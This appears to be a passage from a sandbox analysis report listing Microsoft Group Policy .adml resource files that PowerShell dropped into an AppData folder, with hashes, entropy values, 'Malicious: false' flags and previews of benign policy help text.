SHA1:	16091D04A7A93CC21A3935841D1F30C643C2A782
SHA-256:	2D07C5B7079ED696AA73A4806A1B1FEB2863B6A579033EF1F0A10E3D5D5E5FBC
SHA-512:	D7239C57FA747F36C770D68BBDF31354A9C53D7A7AA3530CE7367FE612CE04B903142CDBBFCBAC11098D47E00D58B0C6620EF18CE324AD9933CBEB0FB5B6D15D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisallowCpls">Hide specified Control Panel items</string>.. <string id="DisallowCpls_Help">This setting allows you to display or hide specified Control Panel items, such as Mouse, System, or Personalization, from the Control Panel window and the Start screen. The setting affects the Start screen and Control Panel window, as well as other ways to access Control Panel items, such as shortcuts in Help and Support or command lines that use control.exe. This policy has no effect on items displayed in PC settings...

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ControlPanelDisplay.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (334), with CRLF line terminators
Category:	dropped
Size (bytes):	21011
Entropy (8bit):	4.7324938774717955
Encrypted:	false
SSDEEP:	384:VfRyKGkSDgF+vXDtchtrWzsbHX92eLb2vB1E4RRN9:VfRXTCrvXDWrWziN2ZvB1fRX
MD5:	61CB7046C23A14515C58521DAD36AB6F
SHA1:	62EC7A88975656944FD8CA72924A916336112465
SHA-256:	A4F9A17502E8ABA9E82C5C324CBED40E109A565CA2E27B3D79389F1A595B3CCD
SHA-512:	13473DEADE6477440D9515C9FC6BABECDB59FE9A806633B003B14E71EC6E762DD9E13A9BFD1DFED554D7CA6A664B3C1EF0CEB7C8278F22CC0E0EEB793E697C1F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Display">Display</string>.. <string id="CPL_Display_Disable">Disable the Display Control Panel</string>.. <string id="CPL_Display_Disable_Help">Disables the Display Control Panel.....If you enable this setting, the Display Control Panel does not run. When users try to start Display, a message appears explaining that a setting prevents the action.....Also, see the "Prohibit access to the Control Panel" (User Configuration\Administrative Templates\Control Panel) and "Remove programs on Settings menu" (User Configuration\Administrative Templates\Star

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Cpls.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	4.924174965870825
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yEBWNvHjWy8XGkjR7S2kjeRqZ+RguJb+RguJM6dGQEn:cgeD5x8gm8fKlBWN7WyeOuJ3uJv3EFV
MD5:	3A236D3ED9A6EAE336DE47BD71132D58
SHA1:	621C59891B91951F2E863EEFEA2D8310FB5125E3
SHA-256:	EF075F5436A4117C29F2D6689A8ED6ACC3BA22EAFBDEEA20C2349DBA5CFE1F33
SHA-512:	862AABB60EFFAC016188CF56BB6EC48F7E4F6847B4A1A4A525C1FD93DAA0269E0CB02DC8362F5B3029F817D1096B8C5BB48FA1717FE4084E2A99CDE13A3CE573
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Users">User Accounts</string>.. <string id="Users_Help">Contains settings to control the behavior of User Accounts</string>.. <string id="UseDefaultTile">Apply the default account picture to all users</string>.. <string id="UseDefaultTile_Help">This policy setting allows an administrator to standardize the account pictures for all users on a system to the default account picture. One application for this policy setting is to standardize the account pictures to a company logo.....Note: The default acc

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CredSsp.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
Category:	dropped
Size (bytes):	20162
Entropy (8bit):	4.80118154121946
Encrypted:	false
SSDEEP:	192:EYLfqDwf4tdJ11wpL9uiansm9cjoOkfmW/MQfB:9qtVPaxu5mUTOYJ
MD5:	3F887766536AE5C7677E841C9A1E86F6
SHA1:	C3BFB966D06DF84A5BD9FCDD9C0CAF23A4F85B28
SHA-256:	91A36F497D459EF96B4CEDB88EE0884651D8B5C0EABCE1C1F4FEC6D49FF71A31
SHA-512:	7777FF19B4B1108A2688D02F25AC69E3F66D87F44A42AD60596B447188728B231E148E67390B39B7CBCF62E83121ECB55A84CB3D72A55827C0489FADABA5469C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowDefaultCredentials">Allow delegating default credentials</string>.. <string id="AllowDefaultCredentials_Explain">This policy setting applies to applications using the Cred SSP component (for example: Remote Desktop Connection).....This policy setting applies when server authentication was achieved by using a trusted X509 certificate or Kerberos.....If you enable this policy setting, you can specify the servers to which the user's default credentials can be delegated (default credentials are those that you

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CredUI.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3126
Entropy (8bit):	4.730467503379261
Encrypted:	false
SSDEEP:	96:LeD5pmUes8vc8gDcwFalisWNFIXwN30M5vYFV:Etes8vc8gowUAvIXwN30M5vYn
MD5:	1C00F0E54B646BACA8571FC0B7BE9582
SHA1:	0494D0849B95970D96E480C9B00C3694E4D50029
SHA-256:	625371BBA40530A9A4A88E167B4870634F7583BB601D16954ED8FF4A0E5242E9
SHA-512:	99A2B51A6ADDF470B15DFDC2D3D32CA305113C427CDF7C3B85FD3BD43F17B989B5BEA38BA78821DA5A8978437DD3E484CCB283D9B01B737C05C4B7D82288D749
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CredUI">Credential User Interface</string>.. <string id="CredUI_Help">Contains settings to control the behavior of credential collection.</string>.. <string id="EnumerateAdministrators">Enumerate administrator accounts on elevation</string>.. <string id="EnumerateAdministrators_Help">This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. By default, administrator accounts are not displayed when the user attempts to elevate a ru

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CredentialProviders.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (479), with CRLF line terminators
Category:	dropped
Size (bytes):	5460
Entropy (8bit):	4.757258895669925
Encrypted:	false
SSDEEP:	96:LeD5pmAznn5XkKkcx1ftU6beY3rqFimzWSsdK/l+3yY8V:Ejznn5XkJcx1fdPrqFOXU/loyb
MD5:	B735FF00BD6511F0525C74881042CFBF
SHA1:	F9540A99E5654EA5F6B7AAF49CE35F591CEC2863
SHA-256:	FF1B853B846EA63064AD460B42C44230DE008297B6A2DDB8DAA48991A5684C14
SHA-512:	A585AE89C4B13A6A2DE50D414069FE40D3DB53395A4E79B5865B530ACC6963B2C89647D2735B27229503B58BAC47B4C43B38E6E2BEB00B81EC6F1D76DB441C06
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DefaultLogonDomain">Assign a default domain for logon</string>.. <string id="DefaultLogonDomain_Help">This policy setting specifies a default logon domain, which might be a different domain than the domain to which the computer is joined. Without this policy setting, at logon, if a user does not specify a domain for logon, the domain to which the computer belongs is assumed as the default domain. For example if the computer belongs to the Fabrikam domain, the default domain for user logon is Fabrikam. ....If y

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\CtrlAltDel.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (353), with CRLF line terminators
Category:	dropped
Size (bytes):	3490
Entropy (8bit):	4.799993012083926
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKwZJBaoC9DxBboMEBar+Nc456uFDPrJNBFiy4jyDznyHSMrmdzcFV:LeD5pm8ZJjQDxXONcOXNB9HyHbrvFV
MD5:	8EB6CBECFCFB7FB15E453E235713F0D2
SHA1:	37170BA6139BD471C4121ED7747E8C9544E64E4A
SHA-256:	23EAF2144B343ACCE5EC33DFB0363BA5B53E1ED8F5E0557F7597F02C1A659B0C
SHA-512:	F3B96C2721592E9C5CD8CAF20DACCAE170B46BDBBBD24D4A6D1ACC3CA3D10BFA9AC23DA2B5B3F9CF7D9F7918236C1C686918BB392595C634E97B56070AEDE007
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CADOptions">Ctrl+Alt+Del Options</string>.. <string id="DisableChangePassword">Remove Change Password</string>.. <string id="DisableChangePassword_Help">This policy setting prevents users from changing their Windows password on demand.....If you enable this policy setting, the 'Change Password' button on the Windows Security dialog box will not appear when you press Ctrl+Alt+Del.....However, users are still able to change their password when prompted by the system. The system prompts users for a new pass

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DCOM.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (507), with CRLF line terminators
Category:	dropped
Size (bytes):	5072
Entropy (8bit):	4.789995597871682
Encrypted:	false
SSDEEP:	96:LeD5pmc4qzQuQ+kCO+QW9JvqIiErBAqHPkGitHqEJw2mL8ykL3/NBV:El4qE9+kCOtW9dqIiErBAgPk/tKEJw2D
MD5:	7DF9E61D5F72660A48741A9D1AE6DF2A
SHA1:	A623BD2021EAA8863519E110E2C4D141D68E6DEE
SHA-256:	BD0E69BF353115E23B4344875DA15DF78BD4ADF676EEAB35AED30A21C129EBED
SHA-512:	726FC2BD5444E1791811C9F39B3B535D155AA0BA2AC8B50F7A8B6FAF48E7BEDBD542C96C701A1CD58B1C89B89DA04D9C175E9CCDE70DA27C92E073E570138DD1
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DCOM">Distributed COM</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList">Allow local activation security check exemptions</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList_Explain">Allows you to specify that local computer administrators can supplement the "Define Activation Security Check exemptions" list.....If you enable this policy setting, and DCOM does not find an explicit entry for a DCOM server application id (appid) in the "Define Activation Security Check exemptions

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DFS.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1550
Entropy (8bit):	4.934966284712348
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yAyjP9jlFxUy3QviR0IhjV:cgeD5x8gm8fK0jlFxUM7FV
MD5:	59649458234FA8EC0FA1CCF6D1A1F000
SHA1:	FA84DC8C633AC66D93C2CC4CA82973690CC01B06
SHA-256:	7C621BDFA9AAFBB72C6E3EAA6BD9DADB9B87B76FF3085C3AB85F94A4BA74148B
SHA-512:	3DAC7345CDF6E474EC6550890D2581E97CECCBDF3D6DA446D0B4051600B81E66725E20E3905FC8ED051E00AE74B7899ECEC073C828E776FB664731218F88E528
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DFSDiscoverDC">Configure how often a DFS client discovers domain controllers</string>.. <string id="DFSDiscoverDC_Help">This policy setting allows you to configure how often a Distributed File System (DFS) client attempts to discover domain controllers on a network. By default, a DFS client attempts to discover domain controllers every 15 minutes.....If you enable this policy setting, you can configure how often a DFS client attempts to discover domain controllers. This value is specified in minutes.....If you

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DWM.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4823
Entropy (8bit):	4.829103521253636
Encrypted:	false
SSDEEP:	96:LeD5pm8i9yPYwH70day2JGkA5mZAOtfMtlV:E1i9Yn0zMA3G6
MD5:	8C0C1F2AC3237B8AA71F88A5650C0E68
SHA1:	8A39FC535339841CC7573B1DCFF729CEC8E54114
SHA-256:	844BF77E54E0C353537B0D1349F0173049DD36C0CB64EAEE900663CD0A227AB4
SHA-512:	C6F8AC395D011EC45EBF47812EBEBF7E152DB6A943566B744AA83B22529DF07E3D0749D008B5F3A8A46953CCCF39305966869E5EFE502B1E727CF55ED7A05F4F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CAT_DesktopWindowManager">Desktop Window Manager</string>.. <string id="CAT_DesktopWindowManagerColorization">Window Frame Coloring</string>.. <string id="DwmDefaultColorizationColor">Specify a default color</string>.. <string id="DwmDefaultColorizationColorExplain">This policy setting controls the default color for window frames when the user does not specify a color. ....If you enable this policy setting and specify a default color, this color is used in glass window frames, if the user does not sp

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Desktop.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
Category:	dropped
Size (bytes):	22651
Entropy (8bit):	4.740040645096249
Encrypted:	false
SSDEEP:	384:sHlNSiouVHqVHdjZjfYBi1lkmX15/5GYyr2cci:qNSiVs9jBwBiHk0v/5Grrh
MD5:	3B0954050C6DFF90CAE771936C61F536
SHA1:	5D6D1097DE13011B78271272B87DE55C2BFFCEA8
SHA-256:	F8DA2C6952EBABA7C70F5BB5941532A2E6112955E3E340F003581E96BB7B0881
SHA-512:	097C9E8A0B5BC0B97777F6A591E7CEF5A2362668B05C42624593069FD4F2E6279EA8D83CBCADA7C973E9E1CCED78B1149889A333021FA904A23BF0D6FBEC06FC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDesktop">Desktop</string>.. <string id="ActiveDirectory">Active Directory</string>.. <string id="AD_EnableFilter">Enable filter in Find dialog box</string>.. <string id="AD_EnableFilter_Help">Displays the filter bar above the results of an Active Directory search. The filter bar consists of buttons for applying additional filters to search results.....If you enable this setting, the filter bar appears when the Active Directory Find dialog box opens, but users can hide it.....If you disable this

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DeviceCompat.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1012
Entropy (8bit):	5.014566400985145
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yFMNWe2PEYLdFV:cgeD5x8gm8fKOE+FV
MD5:	8C5BFC23602CF18E6EC73BDF468C5C65
SHA1:	87C49103ECB11F3284DE1311D305CE426DA77573
SHA-256:	5FE3FC627DFAEDDEDDD5C617D4DDD1AB367353A97026268C27AB45B8A9025472
SHA-512:	ED4BF6B6D7F2F5B248DF14DAA85551613583E8DCFD734266E08296F0DCB52055A2CAD56C23DDFA20EA3315A9DD3B3D538EE673C89E97CFC8D5D9BE39BB575794
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceCompat">Device and Driver Compatibility</string>.. <string id="DeviceFlags">Device compatibility settings</string>.. <string id="DriverShims">Driver compatibility settings</string>.. <string id="DeviceFlags_Help">Changes behavior of Microsoft bus drivers to work with specific devices.</string>.. <string id="DriverShims_Help">Changes behavior of 3rd-party drivers to work around incompatibilities introduced between OS versions.</string>.. </stringTable>.. </resources>..</policyDefinition

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DeviceInstallation.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (671), with CRLF line terminators
Category:	dropped
Size (bytes):	20516
Entropy (8bit):	4.656487634133671
Encrypted:	false
SSDEEP:	384:/Zy2dT4b3O+5KeqO+cpm964BNLKsuV2r4tFHsAvRzw3g:/ZBub+EKebxpm97ODVy4rHb5EQ
MD5:	B0D80E37838946A958789511D6090800
SHA1:	E80EBC94D870B40E9925D9473E83438287A3DF50
SHA-256:	EAD0368B0AB7404ADDC0B8BD016E04D43C7A1E370A2875A6785863A53CC94095
SHA-512:	A13D7AA56FA39803B8CB441DD6907A0F06E2B89EB478B6C6D57687F0E154DE44EF959411627C33D5652D096E439F6518C624A4F159189C8DA7AD51370FB12AD3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_AllowAdminInstall">Allow administrators to override Device Installation Restriction policies</string>.. <string id="DeviceInstall_AllowAdminInstall_Help">This policy setting allows you to determine whether members of the Administrators group can install and update the drivers for any device, regardless of other policy settings.....If you enable this policy setting, members of the Administrators group can use the Add Hardware wizard or the Update Driver wizard to install and update the drivers for

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DeviceSetup.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
Category:	dropped
Size (bytes):	8722
Entropy (8bit):	4.755555827203055
Encrypted:	false
SSDEEP:	96:LeD5pm90hTxQOL2iYoQkdN+Rn+kJu+G6f9Yh3VfPtvCchfvaCz+51qMnHV:EbTmUvQkdN+F+au+G6etntbz+5su
MD5:	9E7C326DCCFD5BDAE53F0FF7359042CF
SHA1:	BFC33D23A42406EF057AC21BCECA4310C256C901
SHA-256:	4E1BC9FDA548EEBF29A499B61CE0462983DD461DB84F4B2C63150636B917036B
SHA-512:	96C937F5F6871D7BD0F3FDF0B6D502232C29C6E77DE7B1FD0A79DB4ADBC7EAAFBC0A60C76C8AF6D5D85CA7397A4C995BE385320C64D23076A7658C1B1187A624
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_BalloonTips">Turn off "Found New Hardware" balloons during device installation</string>.. <string id="DeviceInstall_BalloonTips_Help">This policy setting allows you to turn off "Found New Hardware" balloons during device installation.....If you enable this policy setting, "Found New Hardware" balloons do not appear while a device is being installed.....If you disable or do not configure this policy setting, "Found New Hardware" balloons appear while a device is being installed, unless the driver

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DigitalLocker.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1186
Entropy (8bit):	5.006514157459994
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61yEgDfJvRl9xCRMRq9MXJz1c2igRE3RwMwFxRjX/5Ron:cgeD5x8gm8fKqTtW9M71ibKMFV
MD5:	A4EECA9FC18FD2F595ECC98FD40E0F5F
SHA1:	EFBAB95F94C418BE4B025F3CA14BA3441C1D7CE8
SHA-256:	348B0A60BCA267759CA52611C67B06AB3347CAB23786C257D984EB7F3F94C6A2
SHA-512:	11A2FB546E64CA105CE63E313FCDDE0950939C5981BEEC4D04CEB0C0C43EB573CC3C5444E71BBD12AD04A902CB4D3FC7C41EB4E9BA601232041716CEE0835622
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Digitalx_DiableApplication_TitleText">Do not allow Digital Locker to run</string>.. <string id="Digitalx_DisableApplication_DescriptionText">Specifies whether Digital Locker can run.....Digital Locker is a dedicated download manager associated with Windows Marketplace and a feature of Windows that can be used to manage and download products acquired and stored in the user's Windows Marketplace Digital Locker.....If you enable this setting, Digital Locker will not run.....If you disable or do not configure this

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DiskDiagnostic.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (349), with CRLF line terminators
Category:	dropped
Size (bytes):	4016
Entropy (8bit):	4.799918196062888
Encrypted:	false
SSDEEP:	96:LeD5pmNIlyc4TNq1nCsXGT1fnC7SqnBU+l4vnjzyJ1nCsXGT1fnWmoV:EeIlyc4TN0psngSUG+l4vnjzy3psnWP
MD5:	98FB5567E5194E5E7430C553FD07EE50
SHA1:	9CD9DE9B3E9FAD928DCBB73225B7F77B21D7F532
SHA-256:	3EE2D33B8C14490D4315F669873B1E4747EF4C99CF83CB3214FBE02774DF322D
SHA-512:	2DC8749CB1E401E4A7753933861081D80AB9D11D349730289E36FD59EF3F76CFCE63AC71864B7239C05CFAD12F89D7991F1AA79E78751F926A941F82EADD23C3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. BEGIN: Custom supportedOn strings -->.. <string id="SUPPORTED_WindowsLonghornServerDesktopExperienceOrVista">.. Windows Server 2008 with Desktop Experience installed or Windows Vista.. </string>.. END: Custom supportedOn strings -->.. <string id="DfdAlertPolicy">Disk Diagnostic: Configure custom alert text</string>.. <string id="DfdAlertPolicyExplain">This policy setting substitutes custom alert text in the disk diagnostic message shown to users when a disk reports a S.M.A.R.T. f

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DiskNVCache.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
Category:	dropped
Size (bytes):	4247
Entropy (8bit):	4.68691343915682
Encrypted:	false
SSDEEP:	96:LeD5pm+vfC9KJ5V/MztbEUiTKD48mRCjme9E5J9eWFV:EJN/MdEUiTKs8mwM8Wn
MD5:	74FF3350EF82B0E11EF64C762CF28BE3
SHA1:	8D7BB871CC583EB03E3E104FDC50FCBC974527EB
SHA-256:	D94738C802A64BDA9CCA3947096A97B4DAC05730BD55441ED552595422103A9F
SHA-512:	0729601AD1E861F7DA3E39ECC3878A37AFA3E37C92924446B28FA6BDFB4189D024B7F4E5CE0BF29FE4EB3B51DFA98FE07B7A560DDC521FBDAB4E50EA6C6160C2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootResumePolicy">Turn off boot and resume optimizations</string>.. <string id="BootResumePolicyHelp">This policy setting turns off the boot and resume optimizations for the hybrid hard disks in the system.....If you enable this policy setting, the system does not use the non-volatile (NV) cache to optimize boot and resume.....If you disable this policy setting, the system uses the NV cache to achieve faster boot and resume. The system determines the data that will be stored in the NV cache to optimize boot an

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\DiskQuota.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (382), with CRLF line terminators
Category:	dropped
Size (bytes):	9312
Entropy (8bit):	4.685669628790155
Encrypted:	false
SSDEEP:	96:LeD5pmUA7x7OOWbm7kiE7EC/8GxKU0zOZqIc5fKSuBGfvbKqbKJajDrSy5G+YGmI:EOpKz98U0CgfKSFnWqBXrjksmw03Tja
MD5:	40CA6688DCC63C37ADC92B8CE44A47E1
SHA1:	584E5E4433F642B09081A68167436F41D3615867
SHA-256:	9EA35D39FAB49421022E213BE5B8A66404B41BEB2202E17C94BF557FB8C349C4
SHA-512:	7711A24BE790431495051BAE7DA407FA961748374C0936CB49FD4F421425C4D92458C5F8E2C356E70923EB91D0DE100D6EB7F401D2EF03A18DD590F7FEF8314A
Malicious:	false
